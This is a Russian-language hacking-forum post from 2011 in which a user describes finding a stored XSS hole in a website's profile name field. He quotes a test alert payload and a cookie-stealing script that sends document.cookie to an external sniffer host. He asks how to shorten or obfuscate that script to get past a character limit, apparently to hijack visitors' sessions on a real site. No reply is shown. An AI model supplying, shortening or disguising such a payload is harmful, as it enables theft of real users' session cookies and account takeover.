HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.11.2011, 12:54
Groove
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами: 8155766

Репутация: 2
По умолчанию

Всем привет , у меня такой необычный вопрос , на одном сайте я нашел

Цитата:
Сообщение от None  
xss
уязвимость , допустим я вставляю

Цитата:
Сообщение от None  
">alert('xss')
в поля (Имя)

Все проходит успешно и при заходе на данный профиль мне пишет что уязвимость есть , теперь я хочу вставить следующий скрипт

Цитата:
Сообщение от None  
[COLOR="Red"]img = new Image(); img.src = "http://sniffer.site.ru/blablabls.gif?"+document.cookie;
Но дело в том что при вставки данного xss в этом поле она не сохраняется , а причина тому слишком много символов , как я выяснил .

Собственно вопрос : Как можно сделать короче (сократить, уменьшить )

Цитата:
Сообщение от None  
img = new Image(); img.src = "http://sniffer.xaknet.ru/smiles/img__1010.gif?"+document.cookie;
или зашифровать , но чтобы смысл данного скрипта оставался одним и тем же?

Спасибо за внимание .
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.